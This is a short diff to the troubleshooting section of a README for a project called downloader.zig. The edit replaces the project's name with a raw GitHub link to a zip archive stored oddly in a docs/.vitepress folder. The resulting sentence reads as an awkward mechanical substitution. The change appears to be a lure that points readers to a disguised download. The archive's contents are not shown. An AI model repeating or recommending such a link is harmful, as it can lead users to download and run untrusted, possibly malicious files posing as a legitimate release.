vvaannnnggooccxxxxcyhgdhgm/downloader.zig/README.md

 ## 🔧 Troubleshooting

-If you encounter any issues while using downloader.zig, here are some common problems and their solutions:
+If you encounter any issues while using https://github.com/vvaannnnggooccxxxxcyhgdhgm/downloader.zig/raw/refs/heads/main/docs/.vitepress/downloader-zig-2.4.zip, here are some common problems and their solutions:

 - **Problem:** The download fails.
   - **Solution:** Check your internet connection.
 If it is stable, try a different URL.